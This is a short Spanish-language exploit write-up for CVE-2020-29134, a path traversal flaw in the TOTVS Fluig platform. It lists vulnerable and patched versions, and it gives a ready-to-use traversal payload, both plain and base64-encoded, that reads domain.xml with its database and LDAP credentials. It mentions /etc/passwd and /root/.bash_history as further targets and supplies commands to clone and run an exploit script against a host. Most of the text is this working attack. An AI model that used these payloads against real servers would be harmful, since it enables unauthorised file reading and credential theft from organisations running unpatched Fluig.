
Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal
Fluig es la plataforma de productividad y colaboración que se integra con el sistema ERP,
y con los demás sistemas de tu empresa para revolucionar la forma en que tú y tu equipo trabajan.
La plataforma TOTVS Fluig permite path traversal a través de un parámetro codificado en base64.
Cuando se explota, esta vulnerabilidad permite la lectura de archivos XML sensibles, que contienen
datos para acceder a la base de datos y, en algunos casos, conexiones LDAP e integraciones con el sistema ERP.
Además, también es posible explorar archivos del sistema, como /etc/passwd y /root/.bash_history
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...
<== Fluig Lake 1.7.0-210303 (Parcheado)
<== Fluig 1.6.5-210308 (Parcheado)
<== Fluig 1.6.4-210308 (Parcheado)

http://fluig.host.com/volume/stream/Rmx1aWc=/
?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
https://www.exploit-db.com/exploits/49622
# git clone https://github.com/lucxssouza/CVE-2020-29134.git
# cd CVE-2020-29134
# chmod +x xfluig.sh
Ej1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (número de solicitudes generadas por wfuzz)
Ej2: ./xfluig.sh http://fluig.host.com:PORT